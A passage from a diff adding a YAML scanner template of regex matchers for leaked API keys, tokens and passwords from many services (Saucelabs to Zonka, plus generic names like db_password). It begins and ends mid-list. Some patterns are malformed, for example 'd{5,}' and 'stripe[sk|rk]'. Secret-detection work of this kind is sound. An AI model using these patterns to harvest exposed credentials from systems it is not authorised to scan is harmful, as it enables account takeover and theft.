+ (?:saucelabs).{0,40}\b([a-z0-9]{8}\-[a-z0-9]{4}\-[a-z0-9]{4}\-[a-z0-9]{4}\-[a-z0-9]{12})\b
+ part: body
+ - type: regex
+ name: scalewaykey
+ regex:
+ - >-
+ (?:scaleway).{0,40}\b([0-9a-z]{8}-[a-z0-9]{4}-[a-z0-9]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b
+ part: body
+ - type: regex
+ name: scrapeowl
+ regex:
+ - (?:scrapeowl).{0,40}\b([0-9a-z]{30})\b
+ part: body
+ - type: regex
+ name: scraperapi
+ regex:
+ - (?:scraperapi).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: scraperbox
+ regex:
+ - (?:scraperbox).{0,40}\b([A-Z0-9]{32})\b
+ part: body
+ - type: regex
+ name: scrapersite
+ regex:
+ - (?:scrapersite).{0,40}\b([a-zA-Z0-9]{45})\b
+ part: body
+ - type: regex
+ name: scrapestack
+ regex:
+ - (?:scrapestack).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: scrapfly
+ regex:
+ - (?:scrapfly).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: scrapingant
+ regex:
+ - (?:scrapingant).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: scrapingbee
+ regex:
+ - (?:scrapingbee).{0,40}\b([A-Z0-9]{80})\b
+ part: body
+ - type: regex
+ name: screenshotapi
+ regex:
+ - >-
+ (?:screenshotapi).{0,40}\b([0-9A-Z]{7}\-[0-9A-Z]{7}\-[0-9A-Z]{7}\-[0-9A-Z]{7})\b
+ part: body
+ - type: regex
+ name: screenshotlayer
+ regex:
+ - (?:screenshotlayer).{0,40}\b([a-zA-Z0-9_]{32})\b
+ part: body
+ - type: regex
+ name: securitytrails
+ regex:
+ - (?:securitytrails).{0,40}\b([a-zA-Z0-9]{32})\b
+ part: body
+ - type: regex
+ name: segmentapikey
+ regex:
+ - >-
+ (?:segment).{0,40}\b([A-Za-z0-9_\-a-zA-Z]{43}\.[A-Za-z0-9_\-a-zA-Z]{43})\b
+ part: body
+ - type: regex
+ name: selectpdf
+ regex:
+ - (?:selectpdf).{0,40}\b([a-z0-9-]{36})\b
+ part: body
+ - type: regex
+ name: semaphore
+ regex:
+ - (?:semaphore).{0,40}\b([0-9a-z]{32})\b
+ part: body
+ - type: regex
+ name: sendgrid_api_key
+ regex:
+ - SG\.[\w_]{16,32}\.[\w_]{16,64}
+ part: body
+ - type: regex
+ name: sendbird_1
+ regex:
+ - (?:sendbird).{0,40}\b([0-9a-f]{40})\b
+ part: body
+ - type: regex
+ name: sendbird_2
+ regex:
+ - >-
+ (?:sendbird).{0,40}\b([0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12})\b
+ part: body
+ - type: regex
+ name: sendbirdorganizationapi
+ regex:
+ - (?:sendbird).{0,40}\b([0-9a-f]{24})\b
+ part: body
+ - type: regex
+ name: sendgrid
+ regex:
+ - (?:sendgrid).{0,40}(SG\.[\w\-_]{20,24}\.[\w\-_]{39,50})\b
+ part: body
+ - type: regex
+ name: sendinbluev2
+ regex:
+ - \b(xkeysib\-[A-Za-z0-9_-]{81})\b
+ part: body
+ - type: regex
+ name: sentiment_1
+ regex:
+ - (?:sentiment).{0,40}\b([0-9]{17})\b
+ part: body
+ - type: regex
+ name: sentiment_2
+ regex:
+ - (?:sentiment).{0,40}\b([a-zA-Z0-9]{20})\b
+ part: body
+ - type: regex
+ name: sentrytoken
+ regex:
+ - (?:sentry).{0,40}\b([a-f0-9]{64})\b
+ part: body
+ - type: regex
+ name: serphouse
+ regex:
+ - (?:serphouse).{0,40}\b([0-9A-Za-z]{60})\b
+ part: body
+ - type: regex
+ name: serpstack
+ regex:
+ - (?:serpstack).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: sheety_1
+ regex:
+ - (?:sheety).{0,40}\b([0-9a-z]{32})\b
+ part: body
+ - type: regex
+ name: sheety_2
+ regex:
+ - (?:sheety).{0,40}\b([0-9a-z]{64})\b
+ part: body
+ - type: regex
+ name: sherpadesk
+ regex:
+ - (?:sherpadesk).{0,40}\b([0-9a-z]{32})\b
+ part: body
+ - type: regex
+ name: shipday
+ regex:
+ - (?:shipday).{0,40}\b([a-zA-Z0-9.]{11}[a-zA-Z0-9]{20})\b
+ part: body
+ - type: regex
+ name: shodankey
+ regex:
+ - (?:shodan).{0,40}\b([a-zA-Z0-9]{32})\b
+ part: body
+ - type: regex
+ name: shopify_access_token
+ regex:
+ - shpat_[a-fA-F0-9]{32}
+ part: body
+ - type: regex
+ name: shopify_custom_app_access_token
+ regex:
+ - shpca_[a-fA-F0-9]{32}
+ part: body
+ - type: regex
+ name: shopify_private_app_access_token
+ regex:
+ - shppa_[a-fA-F0-9]{32}
+ part: body
+ - type: regex
+ name: shopify_shared_secret
+ regex:
+ - shpss_[a-fA-F0-9]{32}
+ part: body
+ - type: regex
+ name: shortcut
+ regex:
+ - (?:shortcut).{0,40}\b([0-9a-f-]{36})\b
+ part: body
+ - type: regex
+ name: shotstack
+ regex:
+ - (?:shotstack).{0,40}\b([a-zA-Z0-9]{40})\b
+ part: body
+ - type: regex
+ name: shutterstockoauth
+ regex:
+ - (?:shutterstock).{0,40}\b(v2/[0-9A-Za-z]{388})\b
+ part: body
+ - type: regex
+ name: signalwire_1
+ regex:
+ - \b([0-9a-z-]{3,64}.signalwire.com)\b
+ part: body
+ - type: regex
+ name: signalwire_2
+ regex:
+ - >-
+ (?:signalwire).{0,40}\b([0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b
+ part: body
+ - type: regex
+ name: signalwire_3
+ regex:
+ - (?:signalwire).{0,40}\b([0-9A-Za-z]{50})\b
+ part: body
+ - type: regex
+ name: signaturit
+ regex:
+ - (?:signaturit).{0,40}\b([0-9A-Za-z]{86})\b
+ part: body
+ - type: regex
+ name: signupgenius
+ regex:
+ - (?:signupgenius).{0,40}\b([0-9A-Za-z]{32})\b
+ part: body
+ - type: regex
+ name: sigopt
+ regex:
+ - (?:sigopt).{0,40}\b([A-Z0-9]{48})\b
+ part: body
+ - type: regex
+ name: simplesat
+ regex:
+ - (?:simplesat).{0,40}\b([a-z0-9]{40})
+ part: body
+ - type: regex
+ name: simplynoted
+ regex:
+ - (?:simplynoted).{0,40}\b([a-zA-Z0-9\S]{340,360})\b
+ part: body
+ - type: regex
+ name: simvoly
+ regex:
+ - (?:simvoly).{0,40}\b([a-z0-9]{33})\b
+ part: body
+ - type: regex
+ name: sinchmessage
+ regex:
+ - (?:sinch).{0,40}\b([a-z0-9]{32})\b
+ part: body
+ - type: regex
+ name: sirv_1
+ regex:
+ - (?:sirv).{0,40}\b([a-zA-Z0-9\S]{88})
+ part: body
+ - type: regex
+ name: sirv_2
+ regex:
+ - (?:sirv).{0,40}\b([a-zA-Z0-9]{26})\b
+ part: body
+ - type: regex
+ name: siteleaf
+ regex:
+ - (?:siteleaf).{0,40}\b([0-9Aa-z]{32})\b
+ part: body
+ - type: regex
+ name: skrappio
+ regex:
+ - (?:skrapp).{0,40}\b([a-z0-9A-Z]{42})\b
+ part: body
+ - type: regex
+ name: skybiometry
+ regex:
+ - (?:skybiometry).{0,40}\b([0-9a-z]{25,26})\b
+ part: body
+ - type: regex
+ name: slack
+ regex:
+ - xox[baprs]-[0-9a-zA-Z]{10,48}
+ part: body
+ - type: regex
+ name: slack_token
+ regex:
+ - (xox[pborsa]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})
+ part: body
+ - type: regex
+ name: slack_webhook
+ regex:
+ - >-
+ https://hooks.slack.com/services/T[a-zA-Z0-9_]{8,10}/B[a-zA-Z0-9_]{8,12}/[a-zA-Z0-9_]{23,24}
+ part: body
+ - type: regex
+ name: slack_access_token
+ regex:
+ - xoxb-[0-9A-Za-z\-]{51}
+ part: body
+ - type: regex
+ name: slackwebhook
+ regex:
+ - (https:\/\/hooks.slack.com\/services\/[A-Za-z0-9+\/]{44,46})
+ part: body
+ - type: regex
+ name: smartsheets
+ regex:
+ - (?:smartsheets).{0,40}\b([a-zA-Z0-9]{37})\b
+ part: body
+ - type: regex
+ name: smartystreets_1
+ regex:
+ - (?:smartystreets).{0,40}\b([a-zA-Z0-9]{20})\b
+ part: body
+ - type: regex
+ name: smartystreets_2
+ regex:
+ - (?:smartystreets).{0,40}\b([a-z0-9-]{36})\b
+ part: body
+ - type: regex
+ name: smooch_1
+ regex:
+ - (?:smooch).{0,40}\b(act_[0-9a-z]{24})\b
+ part: body
+ - type: regex
+ name: smooch_2
+ regex:
+ - (?:smooch).{0,40}\b([0-9a-zA-Z_-]{86})\b
+ part: body
+ - type: regex
+ name: snipcart
+ regex:
+ - (?:snipcart).{0,40}\b([0-9A-Za-z_]{75})\b
+ part: body
+ - type: regex
+ name: snykkey
+ regex:
+ - >-
+ (?:snyk).{0,40}\b([0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12})\b
+ part: body
+ - type: regex
+ name: sonarqube_token
+ regex:
+ - sonar.{0,50}(?:"|'|`)?[0-9a-f]{40}(?:"|'|`)?
+ part: body + - type: regex + name: splunkobservabilitytoken + regex: + - (?:splunk).{0,40}\b([a-z0-9A-Z]{22})\b + part: body + - type: regex + name: spoonacular + regex: + - (?:spoonacular).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: sportsmonk + regex: + - (?:sportsmonk).{0,40}\b([0-9a-zA-Z]{60})\b + part: body + - type: regex + name: square + regex: + - (?:square).{0,40}(EAAA[a-zA-Z0-9\-\+\=]{60}) + part: body + - type: regex + name: square_oauth_secret + regex: + - sq0csp-[0-9A-Za-z\-_]{43} + part: body + - type: regex + name: square_access_token + regex: + - sq0atp-[0-9A-Za-z\-_]{22} + part: body + - type: regex + name: squareapp_1 + regex: + - '[\w\-]*sq0i[a-z]{2}-[0-9A-Za-z\-_]{22,43}' + part: body + - type: regex + name: squareapp_2 + regex: + - '[\w\-]*sq0c[a-z]{2}-[0-9A-Za-z\-_]{40,50}' + part: body + - type: regex + name: squarespace + regex: + - >- + (?:squarespace).{0,40}\b([0-9Aa-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b + part: body + - type: regex + name: squareup + regex: + - \b(sq0idp-[0-9A-Za-z]{22})\b + part: body + - type: regex + name: sslmate + regex: + - (?:sslmate).{0,40}\b([a-zA-Z0-9]{36})\b + part: body + - type: regex + name: stitchdata + regex: + - (?:stitchdata).{0,40}\b([0-9a-z_]{35})\b + part: body + - type: regex + name: stockdata + regex: + - (?:stockdata).{0,40}\b([0-9A-Za-z]{40})\b + part: body + - type: regex + name: storecove + regex: + - (?:storecove).{0,40}\b([a-zA-Z0-9_-]{43})\b + part: body + - type: regex + name: stormglass + regex: + - (?:stormglass).{0,40}\b([0-9Aa-z-]{73})\b + part: body + - type: regex + name: storyblok + regex: + - (?:storyblok).{0,40}\b([0-9A-Za-z]{22}t{2})\b + part: body + - type: regex + name: storychief + regex: + - (?:storychief).{0,40}\b([a-zA-Z0-9_\-.]{940,1000}) + part: body + - type: regex + name: strava_1 + regex: + - (?:strava).{0,40}\b([0-9]{5})\b + part: body + - type: regex + name: strava_2 + regex: + - (?:strava).{0,40}\b([0-9a-z]{40})\b + part: body + 
- type: regex + name: streak + regex: + - (?:streak).{0,40}\b([0-9Aa-f]{32})\b + part: body + - type: regex + name: stripe + regex: + - '[rs]k_live_[a-zA-Z0-9]{20,30}' + part: body + - type: regex + name: stripe_api_key_1 + regex: + - sk_live_[0-9a-zA-Z]{24} + part: body + - type: regex + name: stripe_api_key_2 + regex: + - stripe[sr]k_live_[0-9a-zA-Z]{24} + part: body + - type: regex + name: stripe_api_key_3 + regex: + - stripe[sk|rk]_live_[0-9a-zA-Z]{24} + part: body + - type: regex + name: stripe_public_live_key + regex: + - pk_live_[0-9a-z]{24} + part: body + - type: regex + name: stripe_public_test_key + regex: + - pk_test_[0-9a-z]{24} + part: body + - type: regex + name: stripe_restriced_key + regex: + - rk_(?:live|test)_[0-9a-zA-Z]{24} + part: body + - type: regex + name: stripe_restricted_api_key + regex: + - rk_live_[0-9a-zA-Z]{24} + part: body + - type: regex + name: stripe_secret_key + regex: + - sk_(?:live|test)_[0-9a-zA-Z]{24} + part: body + - type: regex + name: stripe_secret_live_key + regex: + - (sk|rk)_live_[0-9a-z]{24} + part: body + - type: regex + name: stripe_secret_test_key + regex: + - (sk|rk)_test_[0-9a-z]{24} + part: body + - type: regex + name: stytch_1 + regex: + - (?:stytch).{0,40}\b([a-zA-Z0-9-_]{47}=) + part: body + - type: regex + name: stytch_2 + regex: + - (?:stytch).{0,40}\b([a-z0-9-]{49})\b + part: body + - type: regex + name: sugester_1 + regex: + - (?:sugester).{0,40}\b([a-zA-Z0-9_.!+$#^*%]{3,32})\b + part: body + - type: regex + name: sugester_2 + regex: + - (?:sugester).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: sumologickey_1 + regex: + - (?:sumo).{0,40}\b([A-Za-z0-9]{14})\b + part: body + - type: regex + name: sumologickey_2 + regex: + - (?:sumo).{0,40}\b([A-Za-z0-9]{64})\b + part: body + - type: regex + name: supernotesapi + regex: + - (?:supernotes).{0,40}([ \r\n]{0,1}[0-9A-Za-z\-_]{43}[ \r\n]{1}) + part: body + - type: regex + name: surveybot + regex: + - (?:surveybot).{0,40}\b([A-Za-z0-9-]{80})\b + 
part: body + - type: regex + name: surveysparrow + regex: + - (?:surveysparrow).{0,40}\b([a-zA-Z0-9-_]{88})\b + part: body + - type: regex + name: survicate + regex: + - (?:survicate).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: swell_2 + regex: + - (?:swell).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: swiftype + regex: + - >- + (?:swiftype).{0,40}\b([a-zA-z-0-9]{6}\_[a-zA-z-0-9]{6}\-[a-zA-z-0-9]{6})\b + part: body + - type: regex + name: tallyfy + regex: + - >- + (?:tallyfy).{0,40}\b([0-9A-Za-z]{36}\.[0-9A-Za-z]{264}\.[0-9A-Za-z\-\_]{683})\b + part: body + - type: regex + name: tatumio + regex: + - (?:tatum).{0,40}\b([0-9a-z-]{36})\b + part: body + - type: regex + name: taxjar + regex: + - (?:taxjar).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: teamgate_1 + regex: + - (?:teamgate).{0,40}\b([a-z0-9]{40})\b + part: body + - type: regex + name: teamgate_2 + regex: + - (?:teamgate).{0,40}\b([a-zA-Z0-9]{80})\b + part: body + - type: regex + name: teamworkcrm + regex: + - >- + (?:teamwork|teamworkcrm).{0,40}\b(tkn\.v1_[0-9A-Za-z]{71}=[ + \r\n]{1}) + part: body + - type: regex + name: teamworkdesk + regex: + - >- + (?:teamwork|teamworkdesk).{0,40}\b(tkn\.v1_[0-9A-Za-z]{71}=[ + \r\n]{1}) + part: body + - type: regex + name: teamworkspaces + regex: + - >- + (?:teamwork|teamworkspaces).{0,40}\b(tkn\.v1_[0-9A-Za-z]{71}=[ + \r\n]{1}) + part: body + - type: regex + name: technicalanalysisapi + regex: + - (?:technicalanalysisapi).{0,40}\b([A-Z0-9]{48})\b + part: body + - type: regex + name: telegram_bot_api_key + regex: + - '[0-9]+:AA[0-9A-Za-z\-_]{33}' + part: body + - type: regex + name: telegram_secret + regex: + - d{5,}:A[0-9a-z_-]{34,34} + part: body + - type: regex + name: telegrambottoken + regex: + - (?:telegram).{0,40}\b([0-9]{8,10}:[a-zA-Z0-9_-]{35})\b + part: body + - type: regex + name: telnyx + regex: + - (?:telnyx).{0,40}\b(KEY[0-9A-Za-z_-]{55})\b + part: body + - type: regex + name: 
terraformcloudpersonaltoken + regex: + - \b([A-Za-z0-9]{14}.atlasv1.[A-Za-z0-9]{67})\b + part: body + - type: regex + name: text2data + regex: + - >- + (?:text2data).{0,40}\b([0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12})\b + part: body + - type: regex + name: textmagic_1 + regex: + - (?:textmagic).{0,40}\b([0-9A-Za-z]{30})\b + part: body + - type: regex + name: textmagic_2 + regex: + - (?:textmagic).{0,40}\b([0-9A-Za-z]{1,25})\b + part: body + - type: regex + name: theoddsapi + regex: + - (?:theoddsapi|the-odds-api).{0,40}\b([0-9a-f]{32})\b + part: body + - type: regex + name: thinkific_1 + regex: + - (?:thinkific).{0,40}\b([0-9a-f]{32})\b + part: body + - type: regex + name: thinkific_2 + regex: + - (?:thinkific).{0,40}\b([0-9A-Za-z]{4,40})\b + part: body + - type: regex + name: thousandeyes_1 + regex: + - (?:thousandeyes).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: thousandeyes_2 + regex: + - >- + (?:thousandeyes).{0,40}\b([a-zA-Z0-9]{3,20}@[a-zA-Z0-9]{2,12}.[a-zA-Z0-9]{2,5})\b + part: body + - type: regex + name: ticketmaster + regex: + - (?:ticketmaster).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: tiingo + regex: + - (?:tiingo).{0,40}\b([0-9a-z]{40})\b + part: body + - type: regex + name: timezoneapi + regex: + - (?:timezoneapi).{0,40}\b([a-zA-Z0-9]{20})\b + part: body + - type: regex + name: tly + regex: + - (?:tly).{0,40}\b([0-9A-Za-z]{60})\b + part: body + - type: regex + name: tmetric + regex: + - (?:tmetric).{0,40}\b([0-9A-Z]{64})\b + part: body + - type: regex + name: todoist + regex: + - (?:todoist).{0,40}\b([0-9a-z]{40})\b + part: body + - type: regex + name: toggltrack + regex: + - (?:toggl).{0,40}\b([0-9Aa-z]{32})\b + part: body + - type: regex + name: tomorrowio + regex: + - (?:tomorrow).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: tomtom + regex: + - (?:tomtom).{0,40}\b([0-9Aa-zA-Z]{32})\b + part: body + - type: regex + name: tradier + regex: + - 
(?:tradier).{0,40}\b([a-zA-Z0-9]{28})\b + part: body + - type: regex + name: travelpayouts + regex: + - (?:travelpayouts).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: travisci + regex: + - (?:travis).{0,40}\b([a-zA-Z0-9A-Z_]{22})\b + part: body + - type: regex + name: trello_url + regex: + - https://trello.com/b/[0-9a-z]/[0-9a-z_-]+ + part: body + - type: regex + name: trelloapikey_2 + regex: + - (?:trello).{0,40}\b([a-zA-Z-0-9]{32})\b + part: body + - type: regex + name: twelvedata + regex: + - (?:twelvedata).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: twilio_1 + regex: + - \bAC[0-9a-f]{32}\b + part: body + - type: regex + name: twilio_api_key + regex: + - SK[0-9a-fA-F]{32} + part: body + - type: regex + name: twitter_client_id + regex: + - twitter[0-9a-z]{18,25} + part: body + - type: regex + name: twitter_secret_key + regex: + - twitter[0-9a-z]{35,44} + part: body + - type: regex + name: tyntec + regex: + - (?:tyntec).{0,40}\b([a-zA-Z0-9]{32})\b + part: body + - type: regex + name: typeform + regex: + - (?:typeform).{0,40}\b([0-9A-Za-z]{44})\b + part: body + - type: regex + name: ubidots + regex: + - \b(BBFF-[0-9a-zA-Z]{30})\b + part: body + - type: regex + name: unifyid + regex: + - (?:unify).{0,40}\b([0-9A-Za-z_=-]{44}) + part: body + - type: regex + name: unplugg + regex: + - (?:unplu).{0,40}\b([a-z0-9]{64})\b + part: body + - type: regex + name: unsplash + regex: + - (?:unsplash).{0,40}\b([0-9A-Za-z_]{43})\b + part: body + - type: regex + name: upcdatabase + regex: + - (?:upcdatabase).{0,40}\b([A-Z0-9]{32})\b + part: body + - type: regex + name: uplead + regex: + - (?:uplead).{0,40}\b([a-z0-9-]{32})\b + part: body + - type: regex + name: uploadcare + regex: + - (?:uploadcare).{0,40}\b([a-z0-9]{20})\b + part: body + - type: regex + name: upwave + regex: + - (?:upwave).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: urlscan + regex: + - (?:urlscan).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: 
userstack + regex: + - (?:userstack).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: vatlayer + regex: + - (?:vatlayer).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: vercel + regex: + - (?:vercel).{0,40}\b([a-zA-Z0-9]{24})\b + part: body + - type: regex + name: verifier_1 + regex: + - >- + (?:verifier).{0,40}\b([a-zA-Z-0-9-]{5,16}\@[a-zA-Z-0-9]{4,16}\.[a-zA-Z-0-9]{3,6})\b + part: body + - type: regex + name: verifier_2 + regex: + - (?:verifier).{0,40}\b([a-z0-9]{96})\b + part: body + - type: regex + name: verimail + regex: + - (?:verimail).{0,40}\b([A-Z0-9]{32})\b + part: body + - type: regex + name: veriphone + regex: + - (?:veriphone).{0,40}\b([0-9A-Z]{32})\b + part: body + - type: regex + name: versioneye + regex: + - (?:versioneye).{0,40}\b([a-zA-Z0-9-]{40})\b + part: body + - type: regex + name: viewneo + regex: + - >- + (?:viewneo).{0,40}\b([a-z0-9A-Z]{120,300}.[a-z0-9A-Z]{150,300}.[a-z0-9A-Z-_]{600,800}) + part: body + - type: regex + name: virustotal + regex: + - (?:virustotal).{0,40}\b([a-f0-9]{64})\b + part: body + - type: regex + name: visualcrossing + regex: + - (?:visualcrossing).{0,40}\b([0-9A-Z]{25})\b + part: body + - type: regex + name: voicegain + regex: + - >- + (?:voicegain).{0,40}\b(ey[0-9a-zA-Z_-]{34}.ey[0-9a-zA-Z_-]{108}.[0-9a-zA-Z_-]{43})\b + part: body + - type: regex + name: vouchery_1 + regex: + - (?:vouchery).{0,40}\b([a-z0-9-]{36})\b + part: body + - type: regex + name: vouchery_2 + regex: + - (?:vouchery).{0,40}\b([a-zA-Z0-9-\S]{2,20})\b + part: body + - type: regex + name: vpnapi + regex: + - (?:vpnapi).{0,40}\b([a-z0-9A-Z]{32})\b + part: body + - type: regex + name: vultrapikey + regex: + - (?:vultr).{0,40} \b([A-Z0-9]{36})\b + part: body + - type: regex + name: vyte + regex: + - (?:vyte).{0,40}\b([0-9a-z]{50})\b + part: body + - type: regex + name: walkscore + regex: + - (?:walkscore).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: weatherbit + regex: + - 
(?:weatherbit).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: weatherstack + regex: + - (?:weatherstack).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: webex_1 + regex: + - (?:error).{0,40}(redirect_uri_mismatch) + part: body + - type: regex + name: webex_2 + regex: + - (?:webex).{0,40}\b([A-Za-z0-9_-]{65})\b + part: body + - type: regex + name: webex_3 + regex: + - (?:webex).{0,40}\b([A-Za-z0-9_-]{64})\b + part: body + - type: regex + name: webflow + regex: + - (?:webflow).{0,40}\b([a-zA0-9]{64})\b + part: body + - type: regex + name: webscraper + regex: + - (?:webscraper).{0,40}\b([a-zA-Z0-9]{60})\b + part: body + - type: regex + name: webscraping + regex: + - (?:webscraping).{0,40}\b([0-9A-Za-z]{32})\b + part: body + - type: regex + name: wepay_2 + regex: + - (?:wepay).{0,40}\b([a-zA-Z0-9_?]{62})\b + part: body + - type: regex + name: whoxy + regex: + - (?:whoxy).{0,40}\b([0-9a-z]{33})\b + part: body + - type: regex + name: worksnaps + regex: + - (?:worksnaps).{0,40}\b([0-9A-Za-z]{40})\b + part: body + - type: regex + name: workstack + regex: + - (?:workstack).{0,40}\b([0-9Aa-zA-Z]{60})\b + part: body + - type: regex + name: worldcoinindex + regex: + - (?:worldcoinindex).{0,40}\b([a-zA-Z0-9]{35})\b + part: body + - type: regex + name: worldweather + regex: + - (?:worldweather).{0,40}\b([0-9a-z]{31})\b + part: body + - type: regex + name: wrike + regex: + - (?:wrike).{0,40}\b(ey[a-zA-Z0-9-._]{333})\b + part: body + - type: regex + name: yandex + regex: + - (?:yandex).{0,40}\b([a-z0-9A-Z.]{83})\b + part: body + - type: regex + name: youneedabudget + regex: + - (?:youneedabudget).{0,40}\b([0-9a-f]{64})\b + part: body + - type: regex + name: yousign + regex: + - (?:yousign).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: zapierwebhook + regex: + - (https:\/\/hooks.zapier.com\/hooks\/catch\/[A-Za-z0-9\/]{16}) + part: body + - type: regex + name: zendeskapi_3 + regex: + - (?:zendesk).{0,40}([A-Za-z0-9_-]{40}) + part: body + 
- type: regex + name: zenkitapi + regex: + - (?:zenkit).{0,40}\b([0-9a-z]{8}\-[0-9A-Za-z]{32})\b + part: body + - type: regex + name: zenscrape + regex: + - >- + (?:zenscrape).{0,40}\b([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\b + part: body + - type: regex + name: zenserp + regex: + - (?:zenserp).{0,40}\b([0-9a-z-]{36})\b + part: body + - type: regex + name: zeplin + regex: + - (?:zeplin).{0,40}\b([a-zA-Z0-9-.]{350,400})\b + part: body + - type: regex + name: zerobounce + regex: + - (?:zerobounce).{0,40}\b([a-z0-9]{32})\b + part: body + - type: regex + name: zipapi_1 + regex: + - (?:zipapi).{0,40}\b([a-zA-Z0-9!=@#$%^]{7,}) + part: body + - type: regex + name: zipapi_3 + regex: + - (?:zipapi).{0,40}\b([0-9a-z]{32})\b + part: body + - type: regex + name: zipcodeapi + regex: + - (?:zipcodeapi).{0,40}\b([a-zA-Z0-9]{64})\b + part: body + - type: regex + name: zonkafeedback + regex: + - (?:zonka).{0,40}\b([A-Za-z0-9]{36})\b + part: body + - type: regex + name: amazon_secret_access_key + regex: + - amazon[_-]?secret[_-]?access[_-]?key(=| =|:| :) + part: body + - type: regex + name: ansible_vault_password + regex: + - ansible[_-]?vault[_-]?password(=| =|:| :) + part: body + - type: regex + name: chrome_client_secret + regex: + - chrome[_-]?client[_-]?secret(=| =|:| :) + part: body + - type: regex + name: chrome_refresh_token + regex: + - chrome[_-]?refresh[_-]?token(=| =|:| :) + part: body + - type: regex + name: ci_deploy_password + regex: + - ci[_-]?deploy[_-]?password(=| =|:| :) + part: body + - type: regex + name: ci_project_url + regex: + - ci[_-]?project[_-]?url(=| =|:| :) + part: body + - type: regex + name: ci_registry_user + regex: + - ci[_-]?registry[_-]?user(=| =|:| :) + part: body + - type: regex + name: ci_server_name + regex: + - ci[_-]?server[_-]?name(=| =|:| :) + part: body + - type: regex + name: cloud_api_key + regex: + - cloud[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: cloudflare_api_key + regex: + - 
cloudflare[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: cloudflare_auth_email + regex: + - cloudflare[_-]?auth[_-]?email(=| =|:| :) + part: body + - type: regex + name: consumer_key + regex: + - consumer[_-]?key(=| =|:| :) + part: body + - type: regex + name: database_username + regex: + - database[_-]?username(=| =|:| :) + part: body + - type: regex + name: db_password + regex: + - db[_-]?password(=| =|:| :) + part: body + - type: regex + name: db_pw + regex: + - db[_-]?pw(=| =|:| :) + part: body + - type: regex + name: docker_hub_password + regex: + - docker[_-]?hub[_-]?password(=| =|:| :) + part: body + - type: regex + name: docker_passwd + regex: + - docker[_-]?passwd(=| =|:| :) + part: body + - type: regex + name: docker_password + regex: + - docker[_-]?password(=| =|:| :) + part: body + - type: regex + name: docker_token + regex: + - docker[_-]?token(=| =|:| :) + part: body + - type: regex + name: dockerhub_password + regex: + - dockerhub[_-]?password(=| =|:| :) + part: body + - type: regex + name: doordash_auth_token + regex: + - doordash[_-]?auth[_-]?token(=| =|:| :) + part: body + - type: regex + name: dropbox_oauth_bearer + regex: + - dropbox[_-]?oauth[_-]?bearer(=| =|:| :) + part: body + - type: regex + name: droplet_travis_password + regex: + - droplet[_-]?travis[_-]?password(=| =|:| :) + part: body + - type: regex + name: env_github_oauth_token + regex: + - env[_-]?github[_-]?oauth[_-]?token(=| =|:| :) + part: body + - type: regex + name: env_heroku_api_key + regex: + - env[_-]?heroku[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: facebook_access_token + regex: + - (EAACEdEose0cBA[0-9A-Za-z]+) + part: body + - type: regex + name: firebase_api_json + regex: + - firebase[_-]?api[_-]?json(=| =|:| :) + part: body + - type: regex + name: firebase_api_token + regex: + - firebase[_-]?api[_-]?token(=| =|:| :) + part: body + - type: regex + name: firebase_key + regex: + - firebase[_-]?key(=| =|:| :) + part: body + - type: 
regex + name: firebase_token + regex: + - firebase[_-]?token(=| =|:| :) + part: body + - type: regex + name: firefox_secret + regex: + - firefox[_-]?secret(=| =|:| :) + part: body + - type: regex + name: ftp_pw + regex: + - ftp[_-]?pw(=| =|:| :) + part: body + - type: regex + name: gh_api_key + regex: + - gh[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: github_api_key + regex: + - github[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: github_oauth + regex: + - github[_-]?oauth(=| =|:| :) + part: body + - type: regex + name: github_token + regex: + - github[_-]?token(=| =|:| :) + part: body + - type: regex + name: github_tokens + regex: + - github[_-]?tokens(=| =|:| :) + part: body + - type: regex + name: google_client_id + regex: + - google[_-]?client[_-]?id(=| =|:| :) + part: body + - type: regex + name: google_client_secret + regex: + - google[_-]?client[_-]?secret(=| =|:| :) + part: body + - type: regex + name: google_maps_api_key + regex: + - google[_-]?maps[_-]?api[_-]?key(=| =|:| :) + part: body + - type: regex + name: google_oauth + regex: + - (ya29.[0-9A-Za-z-_]+) + part: body + - type: regex + name: mailchimp + regex: + - 